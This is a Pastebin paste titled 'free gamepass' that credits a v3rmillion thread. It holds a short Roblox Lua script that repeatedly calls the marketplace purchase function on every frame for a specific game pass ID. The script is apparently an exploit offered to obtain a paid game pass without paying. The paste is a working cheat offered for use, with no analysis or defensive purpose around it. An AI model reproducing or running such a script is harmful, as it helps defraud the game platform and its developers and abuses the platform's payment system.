LonePotato

free gamepass

Mar 30th, 2019
6,446
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 0.43 KB | None | 0 0
  1. ---CREATED BY Samantha ON VERM SO GO VOUCH: https://v3rmillion.net/showthread.php?tid=805671
  2.  
  3. gamePassId = 6028667
  4. market = game:GetService("MarketplaceService")
  5. http = game:GetService("HttpService")
  6. info = market:GetProductInfo(gamePassId, Enum.InfoType.GamePass)
  7. game:GetService("RunService").Stepped:connect(function()
  8. market:PerformPurchase(Enum.InfoType.Asset, info["ProductId"], info["PriceInRobux"], http:GenerateGUID(false))
  9. end)
Add Comment
Please, Sign In to add comment